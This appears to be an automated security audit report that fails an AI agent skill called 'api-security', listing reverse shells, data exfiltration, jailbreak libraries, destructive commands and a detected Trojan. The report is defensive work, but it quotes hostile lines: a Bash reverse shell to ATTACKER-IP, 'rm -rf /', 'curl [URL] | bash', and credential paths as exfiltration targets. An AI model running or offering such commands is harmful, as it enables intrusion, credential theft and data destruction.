api-security

Fail

Audited by Gen Agent Trust Hub on May 11, 2026

Risk Level: CRITICAL
Findings: REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: Documentation in reference/web-llm-attacks-cheat-sheet.md and reference/web-llm-attacks-quickstart.md includes functional reverse shell payloads for Bash, Netcat, Python, and Perl (e.g., bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1).
  • [DATA_EXFILTRATION]: Numerous commands are provided for exfiltrating sensitive system files and credentials (e.g., /etc/passwd, ~/.aws/credentials) to remote servers via HTTP POST, GET, and DNS exfiltration.
  • [PROMPT_INJECTION]: The skill provides an exhaustive library of jailbreak techniques, instruction overrides, and indirect prompt injection patterns designed to bypass LLM safety guardrails.
  • [COMMAND_EXECUTION]: Payloads include destructive system commands (e.g., rm -rf /) and techniques for manipulating database records via SQL and NoSQL injection.
  • [EXTERNAL_DOWNLOADS]: Reference guides provide specific commands for downloading and piping remote scripts directly into system shells (e.g., curl [URL] | bash).
  • [REMOTE_CODE_EXECUTION]: An automated anti-virus scanner detected a Trojan (Script:SNH-gen [Trj]) within the documentation file reference/web-llm-attacks-cheat-sheet.md.
Recommendations
  • CRITICAL: 1 infected file(s) detected - DO NOT USE
  • AI detected serious security threats
Audit Metadata
Risk Level: CRITICAL
Analyzed: May 11, 2026, 07:45 AM
Security Audit — agent-trust-hub — api-security